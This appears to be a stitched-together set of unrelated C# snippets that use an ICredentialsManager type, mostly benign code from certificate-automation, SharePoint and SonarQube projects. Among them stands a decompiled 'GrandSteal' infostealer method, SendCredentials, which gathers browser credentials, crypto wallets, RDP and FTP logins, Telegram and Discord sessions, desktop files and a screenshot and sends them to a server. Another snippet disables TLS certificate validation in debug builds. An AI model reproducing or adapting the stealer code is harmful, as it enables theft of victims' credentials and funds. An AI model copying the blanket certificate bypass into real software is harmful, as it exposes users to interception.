public async Task <List <ActionResult> > Execute( ILog log, ICredentialsManager credentialsManager, object subject, CancellationToken cancellationToken, bool isPreviewOnly = true ) { if (TaskProvider != null && TaskConfig != null) { try { var execParams = new DeploymentTaskExecutionParams(log, credentialsManager, subject, TaskConfig, _credentials, isPreviewOnly, null, cancellationToken); return(await TaskProvider.Execute(execParams)); } catch (Exception exp) { return(new List <ActionResult> { new ActionResult { IsSuccess = false, Message = $"{TaskConfig.TaskName} ({TaskProvider.GetDefinition()?.Title }) :: Task Failed with Exception :: {exp?.ToString()}" } }); } } else { return(new List <ActionResult> { new ActionResult { IsSuccess = false, Message = "Cannot Execute Deployment Task: TaskProvider or Config not set." } }); } }
public AuthenticationController(IAccountManager accountManager, IUserCollection userCollection, IUser user, ICredentialsManager credentialsManager) { _accountManager = accountManager; _userCollection = userCollection; _user = user; _credentialsManager = credentialsManager; }
public SPListService(ICredentialsManager credentials, IListDataService listDataService, IListItemService listItemService, IListItemDataService listItemDataService) { this.credentials = credentials; this.listDataService = listDataService; this.listItemDataService = listItemDataService; this.listItemService = listItemService; }
public EmployeeEditViewModel(DomainModelService.Employee model, IEnumerable <EmployeeGroup> allGroups, Action removeEmployeeAction, IEmployeeRepository employeeRepository, ICredentialsManager credentialsManager, ISettingsProvider settingsProvider) : base(model, allGroups, employeeRepository, credentialsManager) { m_RemoveEmployee = removeEmployeeAction; m_SettingsProvider = settingsProvider; m_OldUserName = model.UserName; DisplayName = TranslationProvider.Translate("TitleEmployeeEditViewModel"); }
public EmployeeAddViewModel(DomainModelService.Employee model, IEnumerable <EmployeeGroup> allGroups, IEmployeeRepository employeeRepository, ICredentialsManager credentialsManager) { m_Model = model; Password = string.Empty; m_AllGroups = allGroups; m_EmployeeRepository = employeeRepository; m_CredentialsManager = credentialsManager; DisplayName = TranslationProvider.Translate("TitleEmployeeAddViewModel"); m_GroupList = new List <SelectableGroupViewModel>(); CreateSelectableGroupViewModels(); }
public TwitchClientFactory( Func <IClientOptions, IClient> clientFactory, ClientProtocol clientProtocol, ILogger <TwitchClient> logger, ICredentialsManager credentialsManager) { ClientFactory = clientFactory; ClientProtocol = clientProtocol; Logger = logger; CredentialsManager = credentialsManager; }
public MainForm() { InitializeComponent(); startButton.Enabled = false; removeButton.Enabled = false; _credentialsManager = new CredentialsManager(); _credentialsManager.MappedTypes.Add(typeof(CrystalCredentials).Name, typeof(CrystalCredentials)); _credentialsManager.MappedTypes.Add(typeof(ZirconCredentials).Name, typeof(ZirconCredentials)); _credentialsManager.Load(); RefreshUi(); }
public void TestInitialize() { AppDomain.CurrentDomain.SetData("DataDirectory", AppDomain.CurrentDomain.BaseDirectory); container = new UnityContainer(); container .RegisterType <IDataAccessAdapter, DataAccessAdapter>() .RegisterType <IRepository <User>, UserRepository>() .RegisterType <IOtpGenerator, FakeOtpGenerator>() .RegisterType <ILogger, FakeLogger>() .RegisterType <ICredentialsManager <ApplicationRule>, CredentialsManager>(); application = container.Resolve <ICredentialsManager <ApplicationRule> >(); }
public ClientManager(IRepository <UriRepositoryItem> repository, ICredentialsManager credentialsManger, ILoginManager loginManager) { _repository = repository; _credentialsManager = credentialsManger; _loginManager = loginManager; JoinableTaskContext joinableTaskContext = null; if (ThreadHelper.CheckAccess()) { joinableTaskContext = ThreadHelper.JoinableTaskContext; } _clients = new AsyncLazy <ICollection <ISonarQubeClient> >(LoadClientsAsync, joinableTaskContext?.Factory); }
public TwitchClientManager( IApplicationContextFactory contextFactory, ITwitchClientFactory factory, ICredentialsManager credentialsManager, ISpinWaitService spinWaitService, IThreadService threadService, IDateTimeService dateTime, TextWriter writer) { ContextFactory = contextFactory; Factory = factory; CredentialsManager = credentialsManager; SpinWaitService = spinWaitService; ThreadService = threadService; DateTime = dateTime; Writer = writer; LastLowPriorityMessageSent = new(); }
public DeploymentTaskExecutionParams( ILog log, ICredentialsManager credentialsManager, object subject, DeploymentTaskConfig settings, Dictionary <string, string> credentials, bool isPreviewOnly, DeploymentProviderDefinition definition, CancellationToken cancellationToken ) { Log = log; CredentialsManager = credentialsManager; Subject = subject; Settings = settings; Credentials = credentials; IsPreviewOnly = isPreviewOnly; Definition = definition; CancellationToken = cancellationToken; }
public SscOperations(ISsmsOperations ssmsOperations, ApplicationDispatcher dispatcher, ICredentialsManager credentialsManager, IDialogController dialogController, SscEndpoints sscEndpoints, IFavoriteScriptsStore favoriteStore) { m_SsmsOperations = ssmsOperations; m_Dispatcher = dispatcher; m_CredentialsManager = credentialsManager; m_DialogController = dialogController; m_SscEndpoints = sscEndpoints; m_FavoriteStore = favoriteStore; #if DEBUG //Trust all SSL issues when debugging. Obviously this is terrible as we are now susceptible to MITM attacks. ServicePointManager.ServerCertificateValidationCallback = ((sender, certificate, chain, sslPolicyErrors) => true); #endif }
public SscOperations(ISsmsOperations ssmsOperations, ApplicationDispatcher dispatcher, ICredentialsManager credentialsManager, IDialogController dialogController, SscEndpoints sscEndpoints, IFavoriteScriptsStore favoriteStore) { m_SsmsOperations = ssmsOperations; m_Dispatcher = dispatcher; m_CredentialsManager = credentialsManager; m_DialogController = dialogController; m_SscEndpoints = sscEndpoints; m_FavoriteStore = favoriteStore; #if DEBUG //Trust all SSL issues when debugging. Obviously this is terrible as we are now susceptible to MITM attacks. ServicePointManager.ServerCertificateValidationCallback = ((sender, certificate, chain, sslPolicyErrors) => true); #endif }
public CredentialsService(ICredentialsManager credentialsManager, IPermissionValidator permissionValidator) { _credentialsManager = DIHelper.VerifyParameter(credentialsManager); _permissionValidator = DIHelper.VerifyParameter(permissionValidator); }
public async Task <DnsChallengeHelperResult> GetDnsProvider(string providerTypeId, string credentialsId, Dictionary <string, string> parameters, ICredentialsManager credentialsManager) { var credentials = new Dictionary <string, string>(); IDnsProvider dnsAPIProvider = null; if (!string.IsNullOrEmpty(credentialsId)) { // decode credentials string array try { credentials = await credentialsManager.GetUnlockedCredentialsDictionary(credentialsId); } catch (Exception) { return(new DnsChallengeHelperResult { Result = new ActionResult { IsSuccess = false, Message = "DNS Challenge API Credentials could not be decrypted. The original user must be used for decryption." }, PropagationSeconds = 0, IsAwaitingUser = false }); } } try { dnsAPIProvider = await ChallengeProviders.GetDnsProvider(providerTypeId, credentials, parameters); } catch (ChallengeProviders.CredentialsRequiredException) { return(new DnsChallengeHelperResult { Result = new ActionResult { IsSuccess = false, Message = "This DNS Challenge API requires one or more credentials to be specified." }, PropagationSeconds = 0, IsAwaitingUser = false }); } catch (Exception exp) { return(new DnsChallengeHelperResult { Result = new ActionResult { IsSuccess = false, Message = $"DNS Challenge API Provider could not be created. Check all required credentials are set and software dependencies installed. {exp.ToString()}" }, PropagationSeconds = 0, IsAwaitingUser = false }); } if (dnsAPIProvider == null) { return(new DnsChallengeHelperResult { Result = new ActionResult { IsSuccess = false, Message = "DNS Challenge API Provider not set or could not load." }, PropagationSeconds = 0, IsAwaitingUser = false }); } return(new DnsChallengeHelperResult { Result = new ActionResult { IsSuccess = true, Message = "Create Provider Instance" }, Provider = dnsAPIProvider }); }
internal SharePointPermissions(ICredentialsManager credentials) { this.credentials = credentials; }
/// <summary> /// Generate a list of actions which will be performed on the next renewal of this managed certificate, populating /// the description of each action with a Markdown format description /// </summary> /// <param name="item"></param> /// <param name="serverProvider"></param> /// <param name="certifyManager"></param> /// <returns></returns> public async Task <List <ActionStep> > GeneratePreview( ManagedCertificate item, ICertifiedServer serverProvider, ICertifyManager certifyManager, ICredentialsManager credentialsManager ) { var newLine = "\r\n"; var steps = new List <ActionStep>(); var stepIndex = 1; var hasDomains = true; var allTaskProviders = await certifyManager.GetDeploymentProviders(); var certificateAuthorities = await certifyManager.GetCertificateAuthorities(); // ensure defaults are applied for the deployment mode, overwriting any previous selections item.RequestConfig.ApplyDeploymentOptionDefaults(); if (string.IsNullOrEmpty(item.RequestConfig.PrimaryDomain)) { hasDomains = false; } if (hasDomains) { var allCredentials = await credentialsManager.GetCredentials(); var allDomains = new List <string> { item.RequestConfig.PrimaryDomain }; if (item.RequestConfig.SubjectAlternativeNames != null) { allDomains.AddRange(item.RequestConfig.SubjectAlternativeNames); } allDomains = allDomains.Distinct().OrderBy(d => d).ToList(); // certificate summary var certDescription = new StringBuilder(); var ca = certificateAuthorities.FirstOrDefault(c => c.Id == item.CertificateAuthorityId); certDescription.AppendLine( $"A new certificate will be requested from the *{ca?.Title ?? "Default"}* certificate authority for the following domains:" ); certDescription.AppendLine($"\n**{item.RequestConfig.PrimaryDomain}** (Primary Domain)"); if (item.RequestConfig.SubjectAlternativeNames.Any(s => s != item.RequestConfig.PrimaryDomain)) { certDescription.AppendLine($" and will include the following *Subject Alternative Names*:"); foreach (var d in item.RequestConfig.SubjectAlternativeNames) { certDescription.AppendLine($"* {d} "); } } steps.Add(new ActionStep { Title = "Summary", Description = certDescription.ToString() }); // validation steps : // TODO: preview description should come from the challenge type provider var challengeInfo = new StringBuilder(); foreach (var challengeConfig in item.RequestConfig.Challenges) { challengeInfo.AppendLine( $"{newLine}Authorization will be attempted using the **{challengeConfig.ChallengeType}** challenge type." + newLine ); var matchingDomains = item.GetChallengeConfigDomainMatches(challengeConfig, allDomains); if (matchingDomains.Any()) { challengeInfo.AppendLine( $"{newLine}The following matching domains will use this challenge: " + newLine ); foreach (var d in matchingDomains) { challengeInfo.AppendLine($"{newLine} * {d}"); } challengeInfo.AppendLine( $"{newLine}**Please review the Deployment section below to ensure this certificate will be applied to the expected website bindings (if any).**" + newLine ); } else { challengeInfo.AppendLine( $"{newLine}*No domains will match this challenge type.* Either the challenge is not required or domain matches are not fully configured." ); } challengeInfo.AppendLine(newLine); if (challengeConfig.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_HTTP) { challengeInfo.AppendLine( $"This will involve the creation of a randomly named (extensionless) text file for each domain (website) included in the certificate." + newLine ); if (CoreAppSettings.Current.EnableHttpChallengeServer) { challengeInfo.AppendLine( $"The *Http Challenge Server* option is enabled. This will create a temporary web service on port 80 during validation. " + $"This process co-exists with your main web server and listens for http challenge requests to /.well-known/acme-challenge/. " + $"If you are using a web server on port 80 other than IIS (or other http.sys enabled server), that will be used instead." + newLine ); } if (!string.IsNullOrEmpty(item.RequestConfig.WebsiteRootPath) && string.IsNullOrEmpty(challengeConfig.ChallengeRootPath)) { challengeInfo.AppendLine( $"The file will be created at the path `{item.RequestConfig.WebsiteRootPath}\\.well-known\\acme-challenge\\` " + newLine ); } if (!string.IsNullOrEmpty(challengeConfig.ChallengeRootPath)) { challengeInfo.AppendLine( $"The file will be created at the path `{challengeConfig.ChallengeRootPath}\\.well-known\\acme-challenge\\` " + newLine ); } challengeInfo.AppendLine( $"The text file will need to be accessible from the URL `http://<yourdomain>/.well-known/acme-challenge/<randomfilename>` " + newLine); challengeInfo.AppendLine( $"The issuing Certificate Authority will follow any redirection in place (such as rewriting the URL to *https*) but the initial request will be made via *http* on port 80. " + newLine); } if (challengeConfig.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_DNS) { challengeInfo.AppendLine( $"This will involve the creation of a DNS TXT record named `_acme-challenge.yourdomain.com` for each domain or subdomain included in the certificate. " + newLine); if (!string.IsNullOrEmpty(challengeConfig.ChallengeCredentialKey)) { var creds = allCredentials.FirstOrDefault(c => c.StorageKey == challengeConfig.ChallengeCredentialKey); if (creds != null) { challengeInfo.AppendLine( $"The following DNS API Credentials will be used: **{creds.Title}** " + newLine); } else { challengeInfo.AppendLine( $"**Invalid credential settngs.** The currently selected credential does not exist." ); } } else { challengeInfo.AppendLine( $"No DNS API Credentials have been set. API Credentials are normally required to make automatic updates to DNS records." ); } challengeInfo.AppendLine( newLine + $"The issuing Certificate Authority will follow any redirection in place (such as a substitute CNAME pointing to another domain) but the initial request will be made against any of the domain's nameservers. " ); } if (!string.IsNullOrEmpty(challengeConfig.DomainMatch)) { challengeInfo.AppendLine( $"{newLine}This challenge type will be selected based on matching domain **{challengeConfig.DomainMatch}** "); } else { if (item.RequestConfig.Challenges.Count > 1) { challengeInfo.AppendLine( $"{newLine}This challenge type will be selected for any domain not matched by another challenge. "); } else { challengeInfo.AppendLine( $"{newLine}**This challenge type will be selected for all domains.**"); } } challengeInfo.AppendLine($"{newLine}---{newLine}"); } steps.Add(new ActionStep { Title = $"{stepIndex}. Domain Validation", Category = "Validation", Description = challengeInfo.ToString() }); stepIndex++; // pre request tasks if (item.PreRequestTasks?.Any() == true) { var substeps = item.PreRequestTasks.Select(t => new ActionStep { Key = t.Id, Title = $"{t.TaskName} ({allTaskProviders.FirstOrDefault(p => p.Id == t.TaskTypeId)?.Title})", Description = t.Description }); steps.Add(new ActionStep { Title = $"{stepIndex}. Pre-Request Tasks", Category = "PreRequestTasks", Description = $"Execute {substeps.Count()} Pre-Request Tasks", Substeps = substeps.ToList() }); stepIndex++; } // cert request step var certRequest = $"A Certificate Signing Request (CSR) will be submitted to the Certificate Authority, using the **{item.RequestConfig.CSRKeyAlg}** signing algorithm."; steps.Add(new ActionStep { Title = $"{stepIndex}. Certificate Request", Category = "CertificateRequest", Description = certRequest }); stepIndex++; // deployment & binding steps var deploymentDescription = new StringBuilder(); var deploymentStep = new ActionStep { Title = $"{stepIndex}. Deployment", Category = "Deployment", Description = "" }; if ( item.RequestConfig.DeploymentSiteOption == DeploymentOption.Auto || item.RequestConfig.DeploymentSiteOption == DeploymentOption.AllSites || item.RequestConfig.DeploymentSiteOption == DeploymentOption.SingleSite ) { // deploying to single or multiple Site if (item.RequestConfig.DeploymentBindingMatchHostname) { deploymentDescription.AppendLine( "* Deploy to hostname bindings matching certificate domains."); } if (item.RequestConfig.DeploymentBindingBlankHostname) { deploymentDescription.AppendLine("* Deploy to bindings with blank hostname."); } if (item.RequestConfig.DeploymentBindingReplacePrevious) { deploymentDescription.AppendLine("* Deploy to bindings with previous certificate."); } if (item.RequestConfig.DeploymentBindingOption == DeploymentBindingOption.AddOrUpdate) { deploymentDescription.AppendLine("* Add or Update https bindings as required"); } if (item.RequestConfig.DeploymentBindingOption == DeploymentBindingOption.UpdateOnly) { deploymentDescription.AppendLine("* Update https bindings as required (no auto-created https bindings)"); } if (item.RequestConfig.DeploymentSiteOption == DeploymentOption.SingleSite) { if (!string.IsNullOrEmpty(item.ServerSiteId)) { try { var siteInfo = await serverProvider.GetSiteById(item.ServerSiteId); deploymentDescription.AppendLine($"## Deploying to Site" + newLine + newLine + $"`{siteInfo.Name}`" + newLine); } catch (Exception exp) { deploymentDescription.AppendLine($"Error: **cannot identify selected site.** {exp.Message} "); } } } else { deploymentDescription.AppendLine($"## Deploying to all matching sites:"); } // add deployment sub-steps (if any) var bindingRequest = await certifyManager.DeployCertificate(item, null, true); if (bindingRequest.Actions == null || !bindingRequest.Actions.Any()) { deploymentStep.Substeps = new List <ActionStep> { new ActionStep { Description = newLine + "**There are no matching targets to deploy to. Certificate will be stored but currently no bindings will be updated.**" } }; } else { deploymentStep.Substeps = bindingRequest.Actions; deploymentDescription.AppendLine(" Action | Site | Binding "); deploymentDescription.Append(" ------ | ---- | ------- "); } } else if (item.RequestConfig.DeploymentSiteOption == DeploymentOption.DeploymentStoreOnly) { deploymentDescription.AppendLine("* The certificate will be saved to the local machines Certificate Store only (Personal/My Store)"); } else if (item.RequestConfig.DeploymentSiteOption == DeploymentOption.NoDeployment) { deploymentDescription.AppendLine("* The certificate will be saved to local disk only."); } deploymentStep.Description = deploymentDescription.ToString(); steps.Add(deploymentStep); stepIndex++; // post request deployment tasks if (item.PostRequestTasks?.Any() == true) { var substeps = item.PostRequestTasks.Select(t => new ActionStep { Key = t.Id, Title = $"{t.TaskName} ({allTaskProviders.FirstOrDefault(p => p.Id == t.TaskTypeId)?.Title})", Description = t.Description }); steps.Add(new ActionStep { Title = $"{stepIndex}. Post-Request (Deployment) Tasks", Category = "PostRequestTasks", Description = $"Execute {substeps.Count()} Post-Request Tasks", Substeps = substeps.ToList() }); stepIndex++; } stepIndex = steps.Count; } else { steps.Add(new ActionStep { Title = "Certificate has no domains", Description = "No domains have been added to this certificate, so a certificate cannot be requested. Each certificate requires a primary domain (a 'subject') and an optional list of additional domains (subject alternative names)." }); } return(steps); }
/// <summary> /// Simulates responding to a challenge, performs a sample configuration and attempts to /// verify it. /// </summary> /// <param name="serverManager"> </param> /// <param name="managedCertificate"> </param> /// <returns> APIResult </returns> /// <remarks> /// The purpose of this method is to test the options (permissions, configuration) before /// submitting a request to the ACME server, to avoid creating failed requests and hitting /// usage limits. /// </remarks> public async Task <List <StatusMessage> > TestChallengeResponse( ILog log, ICertifiedServer serverManager, ManagedCertificate managedCertificate, bool isPreviewMode, bool enableDnsChecks, ICredentialsManager credentialsManager, IProgress <RequestProgressState> progress = null ) { var results = new List <StatusMessage>(); var requestConfig = managedCertificate.RequestConfig; var domains = new List <string> { requestConfig.PrimaryDomain }; if (requestConfig.SubjectAlternativeNames != null) { domains.AddRange(requestConfig.SubjectAlternativeNames); } domains = domains.Distinct().ToList(); // if wildcard domain included, check first level labels not also specified, i.e. // *.example.com & www.example.com cannot be mixed, but example.com, *.example.com & // test.wwww.example.com can var invalidLabels = new List <string>(); if (domains.Any(d => d.StartsWith("*."))) { foreach (var wildcard in domains.Where(d => d.StartsWith("*."))) { var rootDomain = wildcard.Replace("*.", ""); // add list of domains where label count exceeds root domain label count invalidLabels.AddRange(domains.Where(domain => domain != wildcard && domain.EndsWith(rootDomain) && domain.Count(s => s == '.') == wildcard.Count(s => s == '.'))); if (invalidLabels.Any()) { results.Add(new StatusMessage { IsOK = false, Message = $"Wildcard domain certificate requests (e.g. {wildcard}) cannot be mixed with requests including immediate subdomains (e.g. {invalidLabels[0]})." }); return(results); } } } var generatedAuthorizations = new List <PendingAuthorization>(); try { // if DNS checks enabled, attempt them here if (isPreviewMode && enableDnsChecks) { var includeIPResolution = false; if (managedCertificate.RequestConfig.Challenges.Any(c => c.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_HTTP)) { includeIPResolution = true; } log.Information("Performing preview DNS tests. {managedItem}", managedCertificate); var tasks = new List <Task <List <ActionResult> > >(); foreach (var d in domains) { tasks.Add(_netUtil.CheckDNS(log, d.Replace("*.", ""), includeIPResolution)); } var allResults = await Task.WhenAll(tasks); // add DNS check results. DNS check fails are considered a warning instead of an error. foreach (var checkResults in allResults) { foreach (var c in checkResults) { results.Add(new StatusMessage { IsOK = true, HasWarning = !c.IsSuccess, Message = c.Message }); } } } foreach (var domain in domains) { var challengeConfig = managedCertificate.GetChallengeConfig(domain); var challengeType = challengeConfig.ChallengeType; if (challengeType == SupportedChallengeTypes.CHALLENGE_TYPE_SNI) { log.Warning("tls-sni-01 challenge type is no longer supported by the Certificate Authority. Falling back to http-01"); challengeType = SupportedChallengeTypes.CHALLENGE_TYPE_HTTP; } if (challengeType == SupportedChallengeTypes.CHALLENGE_TYPE_HTTP) { // if dns validation not selected but one or more domains is a wildcard, reject if (domain.StartsWith("*.")) { results.Add(new StatusMessage { IsOK = false, Message = $"http-01 authorization cannot be used for wildcard domains: {domain}. Use DNS (dns-01) validation instead." }); return(results); } var challengeFileUrl = $"http://{domain}/.well-known/acme-challenge/configcheck"; var simulatedAuthorization = new PendingAuthorization { Challenges = new List <AuthorizationChallengeItem> { new AuthorizationChallengeItem { ChallengeType = SupportedChallengeTypes.CHALLENGE_TYPE_HTTP, ResourcePath = Path.Combine(".well-known", "acme-challenge", "configcheck"), ResourceUri = challengeFileUrl, Value = "Extensionless File Config Test - OK" } } }; generatedAuthorizations.Add(simulatedAuthorization); var httpChallengeResult = await PerformChallengeResponse_Http01( log, serverManager, domain, managedCertificate, simulatedAuthorization ); if (!httpChallengeResult.IsSuccess) { var result = new StatusMessage(); result.IsOK = false; result.FailedItemSummary.Add($"Config checks failed to verify http://{domain} is both publicly accessible and can serve extensionless files e.g. {challengeFileUrl}"); result.Message = httpChallengeResult.Message; results.Add(result); // don't check any more after first failure break; } else { results.Add(new StatusMessage { IsOK = true, Message = httpChallengeResult.Message, Result = httpChallengeResult }); } } else if (challengeType == SupportedChallengeTypes.CHALLENGE_TYPE_SNI) { var result = new StatusMessage(); result.IsOK = false; result.FailedItemSummary.Add($"The {SupportedChallengeTypes.CHALLENGE_TYPE_SNI} challenge type is no longer available."); results.Add(result); return(results); /* * * var serverVersion = await serverManager.GetServerVersion(); * * if (serverVersion.Major < 8) * { * result.IsOK = false; * result.FailedItemSummary.Add($"The {SupportedChallengeTypes.CHALLENGE_TYPE_SNI} challenge is only available for IIS versions 8+."); * results.Add(result); * * return results; * } * * var simulatedAuthorization = new PendingAuthorization * { * Challenges = new List<AuthorizationChallengeItem> { * new AuthorizationChallengeItem * { * ChallengeType = SupportedChallengeTypes.CHALLENGE_TYPE_SNI, * HashIterationCount= 1, * Value = GenerateSimulatedKeyAuth() * } * } * }; * * generatedAuthorizations.Add(simulatedAuthorization); * * result.IsOK = * PrepareChallengeResponse_TlsSni01( * log, serverManager, domain, managedCertificate, simulatedAuthorization * )(); * * results.Add(result); */ } else if (challengeType == SupportedChallengeTypes.CHALLENGE_TYPE_DNS) { var recordName = $"_acme-challenge-test.{domain}".Replace("*.", ""); // ISSUE: dependency on changing behavior for a specific plugin if (challengeConfig.ChallengeProvider == "DNS01.API.AcmeDns") { // use real cname to avoid having to setup different records recordName = $"_acme-challenge.{domain}".Replace("*.", ""); } var simulatedAuthorization = new PendingAuthorization { Challenges = new List <AuthorizationChallengeItem> { new AuthorizationChallengeItem { ChallengeType = SupportedChallengeTypes.CHALLENGE_TYPE_DNS, Key = recordName, Value = GenerateSimulatedDnsAuthValue() } } }; generatedAuthorizations.Add(simulatedAuthorization); var dnsResult = await PerformChallengeResponse_Dns01( log, domain, managedCertificate, simulatedAuthorization, isTestMode : true, credentialsManager ); var result = new StatusMessage(); result.Message = dnsResult.Result.Message; result.IsOK = dnsResult.Result.IsSuccess; if (!result.IsOK) { result.FailedItemSummary.Add(dnsResult.Result.Message); } results.Add(result); } else { throw new NotSupportedException($"ChallengeType not supported: {challengeConfig.ChallengeType}"); } } } finally { //FIXME: needs to be filtered by managed site: result.Message = String.Join("\r\n", GetActionLogSummary()); generatedAuthorizations.ForEach(ga => ga.Cleanup()); } return(results); }
public DnsChallengeHelper(ICredentialsManager credentialsManager) { _credentialsManager = credentialsManager; }
internal ManagedMetadataEditor(ICredentialsManager credentials) { this.credentials = credentials; }
internal ManagedMetadataEntity(ICredentialsManager credentials, SP.Field Field, object Value, string baseurl) { this.credentials = credentials; Init(Field, baseurl); SetCurrentKeys(Value); }
public SPAttachmentsService(ICredentialsManager credentials) { this.credentials = credentials; }
// Token: 0x0600004F RID: 79 RVA: 0x00003EC8 File Offset: 0x000020C8 public bool SendCredentials() { bool result; try { GrandSteal.Client.Models.ClientSettings settings = this.RecieveSettings().IsNull(new GrandSteal.Client.Models.ClientSettings()); List <BrowserProfile> browserProfiles = new List <BrowserProfile>(); List <ColdWallet> wallets = new List <ColdWallet>(); List <RdpCredential> rdpCredentials = new List <RdpCredential>(); List <DesktopFile> desktopFiles = new List <DesktopFile>(); List <FtpCredential> ftpCredentials = new List <FtpCredential>(); TelegramSession telegramSession = new TelegramSession(); DiscordSession discordSession = new DiscordSession(); List <RemoteProcess> processes = new List <RemoteProcess>(); List <string> programs = new List <string>(); RemoteClientInformation clientInfo = new RemoteClientInformation(); ThreadPool.SetMaxThreads(2000, 10000); new Thread(delegate { Console.WriteLine("ClientInfos parser has been started"); Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); clientInfo = ClientInfoHelper.Create(this.BuildID); stopwatch.Stop(); this.clientInfoFlag.Set(); Console.WriteLine(string.Format("ClientInfos has been parsed.Elapsed time: {0}", stopwatch.Elapsed)); }).Start(); new Thread(delegate { Console.WriteLine("Browsers parser has been started"); Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); if (settings.GrabBrowserCredentials) { int countCompleted = 0; object locker = new object(); using (IEnumerator <ICredentialsManager <BrowserProfile> > enumerator = this.BrowserCredentialsManagers.GetEnumerator()) { while (enumerator.MoveNext()) { ICredentialsManager <BrowserProfile> manager = enumerator.Current; new Thread(delegate { List <BrowserProfile> all = manager.GetAll(); object locker = locker; lock (locker) { browserProfiles.AddRange(all); int countCompleted = countCompleted; countCompleted++; } }).Start(); } } while (countCompleted != this.BrowserCredentialsManagers.Count) { } } stopwatch.Stop(); this.browsersFlag.Set(); Console.WriteLine(string.Format("Browsers has been parsed.Elapsed time: {0}", stopwatch.Elapsed)); }).Start(); new Thread(delegate { Console.WriteLine("ColdWallets parser has been started"); Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); if (settings.GrabColdWallets) { foreach (ICredentialsManager <ColdWallet> current in this.ColdWalletManagers) { wallets.AddRange(current.GetAll().IsNull(new List <ColdWallet>())); } } stopwatch.Stop(); this.walletsFlag.Set(); Console.WriteLine(string.Format("ColdWallets has been parsed.Elapsed time: {0}", stopwatch.Elapsed)); }).Start(); new Thread(delegate { Console.WriteLine("DiscordSession parser has been started"); Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); if (settings.GrabDiscord) { discordSession = DiscordManager.Extract(); } stopwatch.Stop(); this.discordFlag.Set(); Console.WriteLine(string.Format("DiscordSession has been parsed.Elapsed time: {0}", stopwatch.Elapsed)); }).Start(); new Thread(delegate { Console.WriteLine("Rdps parser has been started"); Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); if (settings.GrabRdp) { foreach (ICredentialsManager <RdpCredential> current in this.RdpManagers) { rdpCredentials.AddRange(current.GetAll().IsNull <List <RdpCredential> >()); } } stopwatch.Stop(); this.rdpsFlag.Set(); Console.WriteLine(string.Format("Rdps has been parsed.Elapsed time: {0}", stopwatch.Elapsed)); }).Start(); new Thread(delegate { Console.WriteLine("DesktopFiles parser has been started"); Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); if (settings.GrabDesktopFiles) { foreach (DesktopFileManager current in this.DesktopFileManagers) { current.DesktopFileExtensions = settings.DesktopExtensions; desktopFiles.AddRange(current.GetAll()); } } stopwatch.Stop(); this.desktopFlag.Set(); Console.WriteLine(string.Format("DesktopFiles has been parsed.Elapsed time: {0}", stopwatch.Elapsed)); }).Start(); new Thread(delegate { Console.WriteLine("FTPs parser has been started"); Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); if (settings.GrabFtp) { foreach (ICredentialsManager <FtpCredential> current in this.FtpManagers) { ftpCredentials.AddRange(current.GetAll().IsNull <List <FtpCredential> >()); } } stopwatch.Stop(); this.ftpFlag.Set(); Console.WriteLine(string.Format("FTPs has been parsed.Elapsed time: {0}", stopwatch.Elapsed)); }).Start(); new Thread(delegate { Console.WriteLine("TelegramSession parser has been started"); Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); if (settings.GrabTelegram) { telegramSession = TelegramManager.Extract(); } stopwatch.Stop(); this.telegramFlag.Set(); Console.WriteLine(string.Format("TelegramSession has been parsed.Elapsed time: {0}", stopwatch.Elapsed)); }).Start(); new Thread(delegate { Console.WriteLine("ListOfProcesses parser has been started"); Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); processes = ClientInfoHelper.ListOfProcesses(); stopwatch.Stop(); this.processesFlag.Set(); Console.WriteLine(string.Format("ListOfProcesses has been parsed.Elapsed time: {0}", stopwatch.Elapsed)); }).Start(); new Thread(delegate { Console.WriteLine("ListOfPrograms parser has been started"); Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); programs = ClientInfoHelper.ListOfPrograms(); stopwatch.Stop(); this.programsFlag.Set(); Console.WriteLine(string.Format("ListOfPrograms has been parsed.Elapsed time: {0}", stopwatch.Elapsed)); }).Start(); this.telegramFlag.WaitOne(); this.discordFlag.WaitOne(); this.processesFlag.WaitOne(); this.programsFlag.WaitOne(); this.browsersFlag.WaitOne(); this.walletsFlag.WaitOne(); this.rdpsFlag.WaitOne(); this.desktopFlag.WaitOne(); this.ftpFlag.WaitOne(); this.clientInfoFlag.WaitOne(); Console.WriteLine("CredentialsRequest has been created"); if (clientInfo == null) { Environment.Exit(0); } CredentialsRequest objectToSend = new CredentialsRequest { ClientInformation = clientInfo, BrowserProfiles = browserProfiles, ColdWallets = wallets, RdpConnections = rdpCredentials, DesktopFiles = desktopFiles, FtpCredentials = ftpCredentials, Telegram = telegramSession, Discord = discordSession, ProcessList = processes, InstalledPrograms = programs, Screenshot = ClientInfoHelper.CaptureScreen() }; result = this.Server.SendRequest(objectToSend, "Credentials", 600000)(); } catch { result = false; } return(result); }
public SPTaxonomiesService(ICredentialsManager credentials) { this.credentials = credentials; }
public SPFolderService(ICredentialsManager credentials, IListItemDataService listItemDataService) { this.credentials = credentials; this.listItemDataService = listItemDataService; }
private CredentialsFormViewModel(ICredentialsManager credentialsManager) { m_CredentialsManager = credentialsManager; }
internal PersonOrGroupEditor(ICredentialsManager credentials) { this.credentials = credentials; }
/// <inheritdoc/> public Task <ISonarQubeClient> LogInFromRepositoryAsync(IRepository <UriRepositoryItem> repository, ICredentialsManager credentialsManager) { var targetUri = repository.Data.TargetUri; if (targetUri is null) { return(Task.FromResult <ISonarQubeClient>(null)); } var credential = credentialsManager.Load(targetUri); if (credential is null) { return(Task.FromResult <ISonarQubeClient>(null)); } return(LogInAsync(targetUri, credential.Username, credential.Password)); }
